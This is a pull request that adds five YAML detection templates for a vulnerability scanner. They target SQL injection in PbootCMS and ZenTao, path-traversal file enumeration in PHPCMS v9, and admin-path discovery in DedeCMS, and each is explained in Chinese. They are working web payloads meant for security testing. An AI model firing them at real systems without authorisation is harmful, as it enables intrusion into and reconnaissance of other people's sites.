### PR TITLE
add pocs

### DIFF
--- a/pocs/dedecms-admin-dir-enum.yml
+++ b/pocs/dedecms-admin-dir-enum.yml
@@ -1,0 +1,33 @@
+name: poc-yaml-dedecms-admin-dir-enum
+set:
+  r1: randomLowercase(8)
+rules:
+  - method: GET
+    path: /images/dede.gif
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.content_type == "image/gif"
+  - method: GET
+    path: /IMAGES/DEDE.GIF
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.content_type == "image/gif"
+  - method: POST
+    path: /tags.php
+    body: >-
+      _FILES[mochazz][tmp_name]=./imag<</dede.gif&_FILES[mochazz][name]=0&_FILES[mochazz][size]=0&_FILES[mochazz][type]=image/gif
+    follow_redirects: false
+    expression: |
+      response.status == 200
+  - method: POST
+    path: /tags.php
+    body: >-
+      _FILES[mochazz][tmp_name]=./{{r1}}<</dede.gif&_FILES[mochazz][name]=0&_FILES[mochazz][size]=0&_FILES[mochazz][type]=image/gif
+    follow_redirects: false
+    expression: |
+      response.status == 200 && string(response.body) == "Upload filetype not allow !"
+detail:
+  author: last0monster(https://github.com/last0monster)
+  effect_version: windows + dedecms
+  links:
+    - https://www.freebuf.com/column/163805.html

--- a/pocs/pbootcms-sqli.yml
+++ b/pocs/pbootcms-sqli.yml
@@ -1,0 +1,15 @@
+name: poc-yaml-pbootcms-sqli
+set:
+  r1: randomLowercase(8)
+  r2: randomLowercase(8)
+rules:
+  - method: GET
+    path: /index.php/Search/index?keyword=pboot&{{r1}}={{r2}}
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("执行SQL发生错误！错误：no such column: " + r1)) && response.body.bcontains(bytes(" AND " + r1 + " like '%" + r2 + "%' )"))
+detail:
+  author: last0monster(https://github.com/last0monster)
+  effect_version: pbootcms < v1.3.2
+  links:
+    - https://www.anquanke.com/post/id/167138

--- a/pocs/pbootcms-v121-sqli.yml
+++ b/pocs/pbootcms-v121-sqli.yml
@@ -1,0 +1,15 @@
+name: poc-yaml-pbootcms-v121-sqli
+set:
+  r1: randomLowercase(8)
+  r2: randomLowercase(8)
+rules:
+  - method: GET
+    path: /index.php/Index?ext_{{r1}}={{r2}}
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("执行SQL发生错误！错误：no such column: ext_" + r1)) && response.body.bcontains(bytes(" AND(ext_" + r1 + " like '%" + r2 + "%' )"))
+detail:
+  author: last0monster(https://github.com/last0monster)
+  effect_version: pbootcms = 1.2.1
+  links:
+    - https://xz.aliyun.com/t/3532#toc-2

--- a/pocs/phpcms-file-enum.yml
+++ b/pocs/phpcms-file-enum.yml
@@ -1,0 +1,34 @@
+name: poc-yaml-phpcms-file-enum
+set:
+  r1: randomLowercase(8)
+rules:
+  - method: GET
+    path: >-
+      /api.php/?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/index.html
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.content_type == "image/png" && response.body.bcontains(b"\x89PNG")
+  - method: GET
+    path: >-
+      /api.php/?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/iNdEx.HtmL
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.content_type == "image/png" && response.body.bcontains(b"\x89PNG")
+  - method: GET
+    path: >-
+      /api.php/?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/inde<<
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.content_type == "image/png" && response.body.bcontains(b"\x89PNG")
+  - method: GET
+    path: >-
+      /api.php/?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{{r1}}
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.content_type == "image/png" && response.body.bcontains(b"Cannot Initialize new GD image stream")
+
+detail:
+  author: last0monster(https://github.com/last0monster)
+  effect_version: windows + phpcms v9
+  links:
+    - https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=35472&fromuid=229729?from=beef

--- a/pocs/zentao-sqli.yml
+++ b/pocs/zentao-sqli.yml
@@ -1,0 +1,21 @@
+name: poc-yaml-zentao-sqli
+set:
+  referer: request.url
+  r1: randomLowercase(8)
+  r2: randomLowercase(8)
+  r3: randomLowercase(8)
+  payload: base64(urldecode("%7b%22%6f%72%64%65%72%42%79%22%3a%22" + r1 + "," + r2 + "," + r3 + "%22%2c%22%6e%75%6d%22%3a%22%31%2c%31%22%2c%22%74%79%70%65%22%3a%22%6f%70%65%6e%65%64%62%79%6d%65%22%7d"))
+rules:
+  - method: GET
+    path: /index.php?m=block&f=main&mode=getblockdata&blockid=case&param={{payload}}
+    headers:
+      Referer: '{{referer}}'
+    follow_redirects: false
+    expression: >
+      response.status == 200 && response.body.bcontains(bytes("Unknown column '" + r1 + "' in 'order clause'")) && response.body.bcontains(bytes("`" + r1 + "`,`" + r2 + "`,`" + r3 + "`"))
+detail:
+  author: last0monster(https://github.com/last0monster)
+  effect_version: v8.2~v9.2
+  links:
+    - https://blog.csdn.net/weixin_33966365/article/details/93020545
+    - http://ximcx.cn/post-141.html


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
windows系统下phpcms v9文件名枚举漏洞
## 测试环境
http://down.chinaz.com/soft/28180.htm
## 备注
windows搭建phpcms v9

## 本 poc 是检测什么漏洞的
windows系统下dedecms 后台路径爆破
## 测试环境
http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-UTF8-SP2.tar.gz
## 备注
windows安装dedecms

## 本 poc 是检测什么漏洞的
pbootcms sql 注入
## 测试环境
https://gitee.com/hnaoyun/PbootCMS/releases/V1.3.2
## 备注
安装时数据库选择sqlite，由于数据库后端不确定，检测方式为匹配随机字符串

## 本 poc 是检测什么漏洞的
pbootcms sql 注入 v121
## 测试环境
https://gitee.com/hnaoyun/PbootCMS/releases/V1.2.1
## 备注
安装时数据库选择sqlite，由于数据库后端不确定，检测方式为匹配随机字符串

## 本 poc 是检测什么漏洞的
禅道cms sql 注入 v8.2~v9.2
## 测试环境
http://dl.cnezsoft.com/zentao/9.1.2/ZenTaoPMS.9.1.2.zip
## 备注
order by 字段的注入，pdo方式执行sql，支持多语句，但是无回显，mysql低版本函数可以报错，为了兼容性，匹配了报错信息，和随机字符串。不然就的时间注入


